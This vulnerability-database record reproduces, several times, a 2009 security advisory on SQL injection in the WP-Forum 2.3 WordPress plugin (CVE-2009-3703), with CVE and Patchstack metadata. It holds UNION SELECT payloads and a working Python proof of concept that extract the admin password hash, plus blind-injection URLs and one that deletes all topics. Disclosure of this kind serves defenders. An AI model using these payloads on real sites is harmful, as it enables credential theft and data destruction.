{"lastseen": "2020-04-01T19:05:17", "references": [], "description": "\nWordPress Plugin WP-Forum 2.3 - SQL Injection Blind SQL Injection", "edition": 2, "reporter": "Juan Galiana Lara", "exploitpack": {"type": "webapps", "platform": "php"}, "published": "2009-12-16T00:00:00", "title": "WordPress Plugin WP-Forum 2.3 - SQL Injection Blind SQL Injection", "type": "exploitpack", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3703"]}, {"type": "exploitdb", "idList": ["EDB-ID:10488"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83915"]}, {"type": "patchstack", "idList": ["PATCHSTACK:D9DD06A0C5632F35C9826AFB3667EDC7"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22950", "SECURITYVULNS:VULN:10477"]}, {"type": "seebug", "idList": ["SSV:15104", "SSV:15131", "SSV:18553", "SSV:67199"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:AA5D0ABB-7239-4A9B-B684-9B1ECE51CCF9"]}]}, "score": {"value": -0.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2009-3703"]}, {"type": "exploitdb", "idList": ["EDB-ID:10488"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:83915"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10477"]}, {"type": "seebug", "idList": ["SSV:67199"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:AA5D0ABB-7239-4A9B-B684-9B1ECE51CCF9"]}]}, "exploitation": null, "vulnersScore": -0.0}, "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2009-12-16T00:00:00", "id": "EXPLOITPACK:0EFD0FAD3FFF7DB3BD2A9E40C898AD98", "href": "", "viewCount": 9, "sourceData": "=============================================\nINTERNET SECURITY AUDITORS ALERT 2009-010\n- Original release date: September 28th, 2009\n- Last revised: December 15th, 2009\n- Discovered by: Juan Galiana Lara\n- CVE ID: CVE-2009-3703\n- Severity: 8.5/10 (CVSS Base Score)\n=============================================\n\nI. VULNERABILITY\n-------------------------\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\n\nII. BACKGROUND\n-------------------------\nWP-Forum is a discussion forum plugin for WordPress. It works with\nWordPress 2+ version and PHP >= 5.0\n\nIII. DESCRIPTION\n-------------------------\nWP-Forum fails to sanitized user supplied input and is vulnerable to\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\nof the database including user logins and password's of the WordPress\ninstallation, allowing him to obtain access to the application and\ngain administration privileges.\n\nFor the SQL Injection vulnerability, is possible to concatenate other\nsql requests via \"union select\" sentence. The parameters \"search_max\"\nand \"forum\" are affected by this flaw.\n\nSnippet of vulnerable code:\n\nIn wpf.class file:\n\n1836 $option_max_days = $_POST['search_max']; // <- this\nline is not being sanitized\n1837 $option_forums = $_POST['forum'];\n1838 if(!$option_max_days)\n1839 $option_max_days = 9999;\n1840 $op .= \" AND $this->t_posts.`date` > SUBDATE(CURDATE(),\nINTERVAL $option_max_days DAY) \";\n1841\n...\n1850 foreach((array)$option_forums as $f)\n1851 $a .= $f.\",\"; // <- <- this lines is not being\nsanitized\n1852\n1853 $a = substr($a, 0, strlen($a)-1 );\n1854 if(!$a)\n1855 $w = \"\";\n1856 else\n1857 $w = \"IN($a)\";\n1858\n1859 $sql = \"SELECT $this->t_threads.parent_id as pt,\n$this->t_posts.id, text, $this->t_posts.subject,\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\n('$search_string') AS score\n1860 FROM $this->t_posts inner join $this->t_threads on\n$this->t_posts.parent_id = $this->t_threads.id\n1861 WHERE $this->t_threads.parent_id $w\n1862 AND MATCH (text) AGAINST ('$search_string') $op\";\n\nIn the case of the Blind SQL Injection, the vulnerable code is...\n\nIn wpf-post.php file:\n\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\n 58 $thread = $this->check_parms($_GET['t']);\n 59\n 60 $out .= $this->header();\n 61\n 62 $post = $wpdb->get_row(\"SELECT * FROM $wpforum->t_posts WHERE\nid = $id\"); // <- id is used without clean up\n\nother example:\n\n1490 function remove_post(){\n1491 global $user_level, $user_ID, $wpdb;\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\n1493 $author = $wpdb->get_var(\"SELECT author_id from\n$this->t_posts where id = $id\"); // id is used without clean up\n...\n1503 if($del == \"ok\"){\n1504 $wpdb->query(\"DELETE FROM $this->t_posts WHERE id\n= $id\"); <- // id is used without clean up\n1505 $this->o .= \"<div class='updated'>\".__(\"Post\ndeleted\", \"wpforum\").\"</div>\";\n1506 }\n1507 else\n1508 wp_die(__(\"Cheating, are we?\", \"wpforum\"));\n1509\n1510 }\n\nthe \"id\" parameter is vulnerable in other parts of the source code..\n\nAlso, is possible to delete all records in table $this->t_posts and\n$this->t_threads because $_GET['topic'] is not properly sanitized,\ninjecting something like 1 or 1=1\n\n1479 function remove_topic(){\n1480 global $user_level, $user_ID, $wpdb;\n1481 $topic = $_GET['topic'];\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\n1483 $wpdb->query(\"DELETE FROM $this->t_posts WHERE\nparent_id = $topic\");\n1484 $wpdb->query(\"DELETE FROM $this->t_threads WHERE\nid = $topic\");\n1485 }\n1486 else\n1487 wp_die(__(\"Cheating, are we?\", \"wpforum\"));\n1488\n1489 }\n\nIV. PROOF OF CONCEPT\n-------------------------\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\nin each case\n\nIs possible to obtain any data of the database. Here is a proof of\nconcept to obtain user_pass, user_login and user_email of the user\nwith id=1 of wp_users table (normally admin).\n\nWe have to fill the search_max parameter with the value:\n\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\nand subdate(curdate(), interval 9999\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\nand subdate(curdate(), interval 9999\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\nand subdate(curdate(), interval 9999\n\n## Exploit-DB Note: Try using \"999 DAY)\" if 9999 doesn't work in your environment.\n\nI wrote a PoC, to get automatically the password hash of the WordPress\nadmin account:\n\nuser () linuz:~$ cat wpforum2.3-poc.py\n#!/usr/bin/python\n\n# WP-Forum <= 2.3 SQL Injection PoC\n# Juan Galiana Lara\n# Internet Security Auditors\n\nimport urllib\nimport urllib2\nimport re\n\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\nvalues = {'search_words' : 'any',\n 'search_submit' : 'Search',\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\n\ndata = urllib.urlencode(values)\nreq = urllib2.Request(url, data)\nresponse = urllib2.urlopen(req)\noutput = response.read()\no = re.search('viewtopic.+>([$].+)<',output)\nif o:\n print o.group(1)\n\nuser () linuz:~$ python wpforum2.3-poc.py\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\nuser () linuz:~$\n\nThat's it!\n\nFor the blind sql injection, here are some examples:\n\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\n\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\n\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\n\nIs possible to delete all topics, injecting sql code in \"topic\" parameter:\n\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\n\nV. BUSINESS IMPACT\n-------------------------\nUnauthenticated users can obtain or delete any data of the database.\nThis flaw could result in get access to WordPress accounts including\nthe administrator one.\n\nVI. SYSTEMS AFFECTED\n-------------------------\nWP-Forum <= 2.3 are vulnerable.\n\nVII. SOLUTION\n-------------------------\nUpdate to version 2.4.\n\nVIII. REFERENCES\n-------------------------\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\nhttp://www.wordpress.org/\nhttp://www.isecauditors.com/\n\nIX. CREDITS\n-------------------------\nThis vulnerability has been discovered by\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\n\nX. REVISION HISTORY\n-------------------------\nSeptember 28, 2009: Initial release.\nOctober 13, 2009: Review.\nOctober 19, 2009: Added CVE id.\nDecember 15, 2009: Last revision.\n\nXI. DISCLOSURE TIMELINE\n-------------------------\nSeptember 28, 2009: Vulnerability discovered\n by Internet Security Auditors.\nOctober 13, 2009: Sent to developers. No response.\nDecember 13, 2009: Contact again. Response about its correction.\nDecember 14, 2009: New version published.\nDecember 15, 2009: Advisory released to lists.\n\nXII. LEGAL NOTICES\n-------------------------\nThe information contained within this advisory is supplied \"as-is\"\nwith no warranties or guarantees of fitness of use or otherwise.\nInternet Security Auditors accepts no responsibility for any damage\ncaused by the use or misuse of this information.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "scheme": null, "_state": {"dependencies": 1660004461, "score": 1660007784}, "_internal": {"score_hash": "685120c87057902d604a5436d279f448"}}
{"cve": [{"lastseen": "2022-03-23T21:35:54", "description": "Multiple SQL injection vulnerabilities in the WP-Forum plugin before 2.4 for WordPress allow remote attackers to execute arbitrary SQL commands via (1) the search_max parameter in a search action to the default URI, related to wpf.class.php; (2) the forum parameter to an unspecified component, related to wpf.class.php; (3) the topic parameter in a viewforum action to the default URI, related to the remove_topic function in wpf.class.php; or the id parameter in a (4) editpost or (5) viewtopic action to the default URI, related to wpf-post.php.", "cvss3": {}, "published": "2009-12-18T19:30:00", "type": "cve", "title": "CVE-2009-3703", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3703"], "modified": "2018-10-10T19:47:00", "cpe": ["cpe:/a:fahlstad:wp-forum:1.8", "cpe:/a:fahlstad:wp-forum:2.2", "cpe:/a:fahlstad:wp-forum:1.7.3", "cpe:/a:fahlstad:wp-forum:2.1", "cpe:/a:fahlstad:wp-forum:1.5", "cpe:/a:fahlstad:wp-forum:1.6", "cpe:/a:fahlstad:wp-forum:1.7.4", "cpe:/a:fahlstad:wp-forum:1.7.8", "cpe:/a:fahlstad:wp-forum:1.7", "cpe:/a:fahlstad:wp-forum:2.0"], "id": "CVE-2009-3703", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3703", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:fahlstad:wp-forum:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.7.3:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.6:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.7.4:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:2.2:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.7:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.5:*:*:*:*:*:*:*", "cpe:2.3:a:fahlstad:wp-forum:1.8:*:*:*:*:*:*:*"]}], "patchstack": [{"lastseen": "2022-06-01T19:53:24", "description": "Because of these vulnerabilities, the attackers can execute arbitrary SQL commands.\n\n## Solution\n\n\r\n Update the plugin. \r\n ", "cvss3": {}, "published": "2009-10-15T00:00:00", "type": "patchstack", "title": "WordPress WP Forum Server Plugin <= 2.3 - Multiple SQL Injection", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3703"], "modified": "2009-10-15T00:00:00", "id": "PATCHSTACK:D9DD06A0C5632F35C9826AFB3667EDC7", "href": "https://patchstack.com/database/vulnerability/forum-server/wordpress-wp-forum-server-plugin-2-3-multiple-sql-injection", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2017-11-19T15:26:05", "description": "No description provided by source.", "published": "2014-07-01T00:00:00", "title": "WP-Forum <= 2.3 - SQL Injection & Blind SQL Injection vulnerabilities", "type": "seebug", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-67199", "id": "SSV:67199", "sourceData": "\n =============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-010\r\n- Original release date: September 28th, 2009\r\n- Last revised: December 15th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3703\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWP-Forum is a discussion forum plugin for WordPress. It works with\r\nWordPress 2+ version and PHP >= 5.0\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nWP-Forum fails to sanitized user supplied input and is vulnerable to\r\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\r\nof the database including user logins and password's of the WordPress\r\ninstallation, allowing him to obtain access to the application and\r\ngain administration privileges.\r\n\r\nFor the SQL Injection vulnerability, is possible to concatenate other\r\nsql requests via "union select" sentence. The parameters "search_max"\r\nand "forum" are affected by this flaw.\r\n\r\nSnippet of vulnerable code:\r\n\r\nIn wpf.class file:\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this\r\nline is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) ";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.","; // <- <- this lines is not being\r\nsanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = "";\r\n1856 else\r\n1857 $w = "IN($a)";\r\n1858\r\n1859 $sql = "SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op";\r\n\r\nIn the case of the Blind SQL Injection, the vulnerable code is...\r\n\r\nIn wpf-post.php file:\r\n\r\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n 58 $thread = $this->check_parms($_GET['t']);\r\n 59\r\n 60 $out .= $this->header();\r\n 61\r\n 62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id"); // <- id is used without clean up\r\n\r\nother example:\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var("SELECT author_id from\r\n$this->t_posts where id = $id"); // id is used without clean up\r\n...\r\n1503 if($del == "ok"){\r\n1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id\r\n= $id"); <- // id is used without clean up\r\n1505 $this->o .= "<div class='updated'>".__("Post\r\ndeleted", "wpforum")."</div>";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__("Cheating, are we?", "wpforum"));\r\n1509\r\n1510 }\r\n\r\nthe "id" parameter is vulnerable in other parts of the source code..\r\n\r\nAlso, is possible to delete all records in table $this->t_posts and\r\n$this->t_threads because $_GET['topic'] is not properly sanitized,\r\ninjecting something like 1 or 1=1\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query("DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic");\r\n1484 $wpdb->query("DELETE FROM $this->t_threads WHERE\r\nid = $topic");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__("Cheating, are we?", "wpforum"));\r\n1488\r\n1489 }\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\r\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\r\nin each case\r\n\r\nIs possible to obtain any data of the database. Here is a proof of\r\nconcept to obtain user_pass, user_login and user_email of the user\r\nwith id=1 of wp_users table (normally admin).\r\n\r\nWe have to fill the search_max parameter with the value:\r\n\r\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n\r\nI wrote a PoC, to get automatically the password hash of the WordPress\r\nadmin account:\r\n\r\nuser () linuz:~$ cat wpforum2.3-poc.py\r\n#!/usr/bin/python\r\n\r\n# WP-Forum <= 2.3 SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Internet Security Auditors\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\n\r\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\r\nvalues = {'search_words' : 'any',\r\n 'search_submit' : 'Search',\r\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\r\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\r\n\r\ndata = urllib.urlencode(values)\r\nreq = urllib2.Request(url, data)\r\nresponse = urllib2.urlopen(req)\r\noutput = response.read()\r\no = re.search('viewtopic.+>([$].+)<',output)\r\nif o:\r\n print o.group(1)\r\n\r\nuser () linuz:~$ python wpforum2.3-poc.py\r\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\r\nuser () linuz:~$\r\n\r\nThat's it!\r\n\r\nFor the blind sql injection, here are some examples:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\r\n\r\nIs possible to delete all topics, injecting sql code in "topic" parameter:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can obtain or delete any data of the database.\r\nThis flaw could result in get access to WordPress accounts including\r\nthe administrator one.\r\n\r\nVI. SYSTEMS AFFECTED\r\n-------------------------\r\nWP-Forum <= 2.3 are vulnerable.\r\n\r\nVII. SOLUTION\r\n-------------------------\r\nUpdate to version 2.4.\r\n\r\nVIII. REFERENCES\r\n-------------------------\r\nhttp://www.fahlstad.se/wp-plugins/wp-forum/\r\nhttp://www.wordpress.org/\r\nhttp://www.isecauditors.com/\r\n\r\nIX. CREDITS\r\n-------------------------\r\nThis vulnerability has been discovered by\r\nJuan Galiana Lara (jgaliana (at) isecauditors (dot) com).\r\n\r\nX. REVISION HISTORY\r\n-------------------------\r\nSeptember 28, 2009: Initial release.\r\nOctober 13, 2009: Review.\r\nOctober 19, 2009: Added CVE id.\r\nDecember 15, 2009: Last revision.\r\n\r\nXI. DISCLOSURE TIMELINE\r\n-------------------------\r\nSeptember 28, 2009: Vulnerability discovered\r\n by Internet Security Auditors.\r\nOctober 13, 2009: Sent to developers. No response.\r\nDecember 13, 2009: Contact again. Response about its correction.\r\nDecember 14, 2009: New version published.\r\nDecember 15, 2009: Advisory released to lists.\r\n\r\nXII. LEGAL NOTICES\r\n-------------------------\r\nThe information contained within this advisory is supplied "as-is"\r\nwith no warranties or guarantees of fitness of use or otherwise.\r\nInternet Security Auditors accepts no responsibility for any damage\r\ncaused by the use or misuse of this information.\r\n\n ", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67199"}, {"lastseen": "2017-11-19T18:24:16", "description": "No description provided by source.", "published": "2009-12-17T00:00:00", "type": "seebug", "title": "WP-Forum <= 2.3 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-3703"], "modified": "2009-12-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-15104", "id": "SSV:15104", "sourceData": "\n =============================================\r\nINTERNET SECURITY AUDITORS ALERT 2009-010\r\n- Original release date: September 28th, 2009\r\n- Last revised: December 15th, 2009\r\n- Discovered by: Juan Galiana Lara\r\n- CVE ID: CVE-2009-3703\r\n- Severity: 8.5/10 (CVSS Base Score)\r\n=============================================\r\n\r\nI. VULNERABILITY\r\n-------------------------\r\nWP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities\r\n\r\nII. BACKGROUND\r\n-------------------------\r\nWP-Forum is a discussion forum plugin for WordPress. It works with\r\nWordPress 2+ version and PHP >= 5.0\r\n\r\nIII. DESCRIPTION\r\n-------------------------\r\nWP-Forum fails to sanitized user supplied input and is vulnerable to\r\nSQL Injection and Blind SQL Injection. An attacker can obtain any data\r\nof the database including user logins and password's of the WordPress\r\ninstallation, allowing him to obtain access to the application and\r\ngain administration privileges.\r\n\r\nFor the SQL Injection vulnerability, is possible to concatenate other\r\nsql requests via "union select" sentence. The parameters "search_max"\r\nand "forum" are affected by this flaw.\r\n\r\nSnippet of vulnerable code:\r\n\r\nIn wpf.class file:\r\n\r\n1836 $option_max_days = $_POST['search_max']; // <- this\r\nline is not being sanitized\r\n1837 $option_forums = $_POST['forum'];\r\n1838 if(!$option_max_days)\r\n1839 $option_max_days = 9999;\r\n1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),\r\nINTERVAL $option_max_days DAY) ";\r\n1841\r\n...\r\n1850 foreach((array)$option_forums as $f)\r\n1851 $a .= $f.","; // <- <- this lines is not being\r\nsanitized\r\n1852\r\n1853 $a = substr($a, 0, strlen($a)-1 );\r\n1854 if(!$a)\r\n1855 $w = "";\r\n1856 else\r\n1857 $w = "IN($a)";\r\n1858\r\n1859 $sql = "SELECT $this->t_threads.parent_id as pt,\r\n$this->t_posts.id, text, $this->t_posts.subject,\r\n$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST\r\n('$search_string') AS score\r\n1860 FROM $this->t_posts inner join $this->t_threads on\r\n$this->t_posts.parent_id = $this->t_threads.id\r\n1861 WHERE $this->t_threads.parent_id $w\r\n1862 AND MATCH (text) AGAINST ('$search_string') $op";\r\n\r\nIn the case of the Blind SQL Injection, the vulnerable code is...\r\n\r\nIn wpf-post.php file:\r\n\r\n 57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n 58 $thread = $this->check_parms($_GET['t']);\r\n 59\r\n 60 $out .= $this->header();\r\n 61\r\n 62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE\r\nid = $id"); // <- id is used without clean up\r\n\r\nother example:\r\n\r\n1490 function remove_post(){\r\n1491 global $user_level, $user_ID, $wpdb;\r\n1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned\r\n1493 $author = $wpdb->get_var("SELECT author_id from\r\n$this->t_posts where id = $id"); // id is used without clean up\r\n...\r\n1503 if($del == "ok"){\r\n1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id\r\n= $id"); <- // id is used without clean up\r\n1505 $this->o .= "<div class='updated'>".__("Post\r\ndeleted", "wpforum")."</div>";\r\n1506 }\r\n1507 else\r\n1508 wp_die(__("Cheating, are we?", "wpforum"));\r\n1509\r\n1510 }\r\n\r\nthe "id" parameter is vulnerable in other parts of the source code..\r\n\r\nAlso, is possible to delete all records in table $this->t_posts and\r\n$this->t_threads because $_GET['topic'] is not properly sanitized,\r\ninjecting something like 1 or 1=1\r\n\r\n1479 function remove_topic(){\r\n1480 global $user_level, $user_ID, $wpdb;\r\n1481 $topic = $_GET['topic'];\r\n1482 if($this->is_moderator($user_ID, $this->current_forum)){\r\n1483 $wpdb->query("DELETE FROM $this->t_posts WHERE\r\nparent_id = $topic");\r\n1484 $wpdb->query("DELETE FROM $this->t_threads WHERE\r\nid = $topic");\r\n1485 }\r\n1486 else\r\n1487 wp_die(__("Cheating, are we?", "wpforum"));\r\n1488\r\n1489 }\r\n\r\nIV. PROOF OF CONCEPT\r\n-------------------------\r\nIn the url: http://example.com/blog/?page_id=3&wpforumaction=search\r\nreplacing 'page_id=3' parameter with the number of the WP-Forum page\r\nin each case\r\n\r\nIs possible to obtain any data of the database. Here is a proof of\r\nconcept to obtain user_pass, user_login and user_email of the user\r\nwith id=1 of wp_users table (normally admin).\r\n\r\nWe have to fill the search_max parameter with the value:\r\n\r\n9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1\r\nand subdate(curdate(), interval 9999\r\n\r\nI wrote a PoC, to get automatically the password hash of the WordPress\r\nadmin account:\r\n\r\nuser@linuz:~$ cat wpforum2.3-poc.py\r\n#!/usr/bin/python\r\n\r\n# WP-Forum <= 2.3 SQL Injection PoC\r\n# Juan Galiana Lara\r\n# Internet Security Auditors\r\n\r\nimport urllib\r\nimport urllib2\r\nimport re\r\n\r\nurl = 'http://site//wordpress/?page_id=3&wpforumaction=search'\r\nvalues = {'search_words' : 'any',\r\n 'search_submit' : 'Search',\r\n 'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1\r\nfrom wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }\r\n\r\ndata = urllib.urlencode(values)\r\nreq = urllib2.Request(url, data)\r\nresponse = urllib2.urlopen(req)\r\noutput = response.read()\r\no = re.search('viewtopic.+>([$].+)<',output)\r\nif o:\r\n\tprint o.group(1)\r\n\r\nuser@linuz:~$ python wpforum2.3-poc.py\r\n$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/\r\nuser@linuz:~$\r\n\r\nThat's it!\r\n\r\nFor the blind sql injection, here are some examples:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1\r\n\r\nIs possible to delete all topics, injecting sql code in "topic" parameter:\r\n\r\nhttp://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1\r\n\r\nV. BUSINESS IMPACT\r\n-------------------------\r\nUnauthenticated users can obtain or delete any data of the 